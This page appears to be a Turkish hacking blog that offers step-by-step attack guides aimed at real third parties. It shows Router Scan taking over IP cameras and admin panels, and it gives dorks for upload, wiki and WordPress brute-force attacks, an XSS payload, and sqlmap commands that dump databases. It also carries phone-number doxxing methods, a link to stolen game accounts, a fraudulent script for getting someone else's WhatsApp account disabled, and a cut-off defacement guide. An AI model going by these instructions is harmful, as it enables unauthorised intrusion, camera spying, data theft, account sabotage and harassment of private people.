21 Ekim 2022 Cuma

Router Scan.: Kamera ve admin panel hackleme [TR]



 Bu konumuzda başlıktan da belli olduğu şekilde Router Scan kullanımını anlatıcam. Bu programa alternatif "Angry IP Scanner" var ama o sadece açık makineleri buluyor. Bu program ise açık makineleri ve onların şifrelerinide veriyor.

1- Öncelikle aşağıda verdiğim programı indiriyorsunuz.
http://stascorp.com/load/1-1-0-56
2- Programı indirdikten sonra "Router Scan.exe" dosyasını çalıştırıyorsunuz.



3-Burda İP aralıklarını bulmak için şu adrese gidin 
https://www.nirsoft.net/countryip/tr.html
4-Burdaki İP aralıklarını programa girin.
(sol üstteki boş alanda + tuşuna basıp) enter ip's olan
5- Sonra sol üstte 
"Start Scan" butonuna basıyoruz ve program çalışmaya başlıyor.


6- Burda 
"Good Results" bölümüne gidiyoruz. Bekledikten sonra İP'ler ve daha bir çok bilgi karşımıza geliyor.


 7-Bu bölümde kamera hacklediyseniz 
"Device Type" bölümünde "IP Camera" yada "DVR Client" yazar.


8- Hacklediğiniz IP'ye tarayıcınızda gidiyorsunuz ve programın size verdiği şifreyi giriyorsunuz. Ve artık girdiniz.


((eğer kameralarda görüntü yoksa IE Tab adlı eklentiyi googleye ekleyin ve sayfayı o ekletiyle çalıştırın))

nmap router.scan.7787 98.477.88.123





Numaradan Kişi bulma (İllegal yöntemsiz)

 1-Truecaller


http://truecaller.com bu siteye kaydolun ve numarayı arayın %30 ihtimalle ad soyadı çıkar.


2-Whatsapp


Hedef numarayı kaydedin ve WhatsApp hesabına bakın. Belki fotoğrafına/ad soyadina erisilsiniz.


3-Facebook

Hesabımı unuttum yerinden hedef numarayı yazın eğer numara bir facebook hesabına bağlıysa karşınıza hesap gelir. Hesaba gidip bilgi toplayabilirsiniz.

Bir Kişinin Kullandığı Socia Media Hesaplarını Bulma (linux)

 Aynı kullanıcı adının 75'ten fazla sosyal ağlardaki hesaplarını bulmak içindir


terminali açalım ve başlıyalım


git clone https://github.com/issamelferkh/userrecon


cd Downloads


cd Masaüstü, cd Desktop


cd userrecon


chmod +x userrecon.sh


./userrecon.sh


Geriye kalan tek şey kullanıcı adını yazmak. Örn : virtuoso41

Pubg 1.8k adet hesap FRESH

 https://justpaste.it/6nas3

Site h4ck1ng methodları anlatım

 1 - Upload Açığı ile site hackleme


Dork: intitle:"Powered by Phuploader"

Bunu Googlede aratırıyoruz ve sitelere tek tek indeximizin resmini yada html dosyasını yüklüyoruz.


2 - Waka wikii açığı ile hackleme


Dork: wakka.php?wiki=

Örnk: hacktivizm.org/wikini/wakka.php?"wiki=7juin/edit" linkin sonuna /edit koyuyoruz

Not: Siteye zarar vermez sadece zone kasmak icin kullanılabilir


3 - Brute Force ( Kaba Kuvvet )


Bu bir açık değildir. site üzerinde belirlenen admin - admin listesini kontrol eder ve olumlu sonucları size gösterir.

Dorukumuz:

/wp-content/plugins/hits

/wp-content/plugins/last

/wp-content/plugins/send

/wp-content/plugins/note

/wp-content/plugins/climb

/wp-content/plugins/sorry

/wp-content/plugins/gear

/wp-content/plugins/nothing

/wp-content/plugins/all

/wp-content/plugins/after


Arama motor isimli programımıza yapıştırıp araya basıyoruz bulunan siteleri kaydetip brute force adlı programımızı açıyoruz

Admin Ve Passlarımız ekliyip başlata basıyoruz. bulunan sonuclar alta gözükücektir. (DETAYLI BİLGİ İCİN @ghostkurts a instgram yolu ile iletisime geciniz)


4 - XSS Açığı


bu benim en çok kullandım açıklardan biridir.


Dorkumuz: index.php?id=

rasgele sitede bulunan arama butonlarına <script>alert(“Ghost Kurts”);</script> yapıştırıyoruz

Örnek:(hacktivizm.org/index.php?id=<script>alert(“Ghost Kurts”);</script> )

Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok


5 - SQL Açığı


En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz.

Bilgisiyarımıza sqlmap kurduktan sonra cmdye açıyoruz ve şu komutları yazıyoruz.


cd ..


cd ..


cd sqlmap


sqlmap.py -u www.virtuoso41.blogstop.com/index.php?id=5 --dbs


Karşımızda Aşağılarda " available_database " Olacaktır Onun Altındakiler Bizim Databaselerimiz

Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz


sqlmap.py -u www.virtuoso41.blogspot.com//index.php?id=5 -D Databaseismi --tables


sqlmap.py -u www.virtuoso41.blogspot.com/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump


SqlMap İndirme Linki: https://sqlmap.org/

Whatsapp hesap kapama

 support@whatsapp.com buraya mail gönderiyoruz.


Konu : ACİL YARDIMINIZA İHTİYACIM VAR !!

Açıklama : Merhaba sayın WhatsApp ekibi , dün gittiğim cafe de telefonumu kaybettim. WhatsApp hesabımda özel konuşmalarım , fotoğraflarım ve videolarım vardır. WhatsApp hesabımın devre dışı bırakılmasını istiyorum.

2 3 dk sonra sizden numara isteyecek.

Yanıt olarak ;

Türkiye, +90

Şeklinde numarayı atın 6 saat içinde kapanır.

Ebedi kapatmak için ise kodu buga sokun.

Kod nasıl buga sokulur anlatayım.

Wp business indirin ve wpsini kapattığıniz numarayı yazın.

Kod ekranı gelecek.

Kod ve beni ara gönderin.

Gönderdikten sonra kod yazma yerine random rakamlar yazın.

Bunu böyle yapa yapa 5 dk uğraşarak 12 saat kapatırsınız.

12 saat sonra yeniden aynısını yapın.

Zone-h kasma teknikleri anlatım

  1-) SubDomain ( Alt Domain ) Hacklediğimiz Sitenin Mainine İndex Attıktan Sonra İşim Bitti Diyipte Çıkmayın , Shellden SubDomainlerede Sel...